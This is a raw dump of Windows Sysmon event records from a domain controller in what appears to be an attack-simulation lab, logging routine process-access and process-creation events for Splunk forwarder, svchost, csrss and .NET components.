 10341000x80000000000000007387Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:24:17.754{08A6967A-4286-6000-0500-000000009A01}636652C:\Windows\system32\csrss.exe{08A6967A-4601-6000-4303-000000009A01}1812C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007386Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:24:17.754{08A6967A-4325-6000-B900-000000009A01}11763752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{08A6967A-4601-6000-4303-000000009A01}1812C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000007385Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:24:17.754{08A6967A-4601-6000-4303-000000009A01}1812C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{08A6967A-4286-6000-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{08A6967A-4325-6000-B900-000000009A01}1176C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000007384Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:24:17.613{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4601-6000-4203-000000009A01}4176C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007383Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:24:17.597{08A6967A-4286-6000-0500-000000009A01}6361144C:\Windows\system32\csrss.exe{08A6967A-4601-6000-4203-000000009A01}4176C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007382Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:24:17.597{08A6967A-44E3-6000-3401-000000009A01}7284492C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{08A6967A-4601-6000-4203-000000009A01}4176C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 11241100x80000000000000007381Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.localDLL2021-01-14 13:24:17.472{08A6967A-4600-6000-4103-000000009A01}4872C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\1308-0\System.Drawing.dll2021-01-14 13:24:17.472 10341000x80000000000000007415Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:24:18.582{08A6967A-4602-6000-4503-000000009A01}37803368C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{08A6967A-4325-6000-B900-000000009A01}1176C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007414Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:24:18.426{08A6967A-4325-6000-BD00-000000009A01}30161356C:\Windows\system32\conhost.exe{08A6967A-4602-6000-4503-000000009A01}3780C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007413Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:24:18.426{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007412Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:24:18.426{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007411Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:24:18.426{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007410Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:24:18.426{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007409Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:24:18.426{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007408Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:24:18.426{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007407Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:24:18.426{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007406Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:24:18.426{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007405Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:24:18.426{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007404Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:24:18.426{08A6967A-4286-6000-0500-000000009A01}6361144C:\Windows\system32\csrss.exe{08A6967A-4602-6000-4503-000000009A01}3780C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007403Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:24:18.426{08A6967A-4325-6000-B900-000000009A01}11763752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{08A6967A-4602-6000-4503-000000009A01}3780C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000007402Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:24:18.426{08A6967A-4602-6000-4503-000000009A01}3780C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{08A6967A-4286-6000-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{08A6967A-4325-6000-B900-000000009A01}1176C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000007401Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:24:18.004{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4601-6000-4403-000000009A01}3740C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007429Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:24:19.238{08A6967A-4603-6000-4603-000000009A01}39803796C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{08A6967A-4325-6000-B900-000000009A01}1176C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007428Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:24:19.082{08A6967A-4325-6000-BD00-000000009A01}30161356C:\Windows\system32\conhost.exe{08A6967A-4603-6000-4603-000000009A01}3980C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007427Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:24:19.082{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007426Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:24:19.082{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007425Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:24:19.082{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007424Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:24:19.082{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYST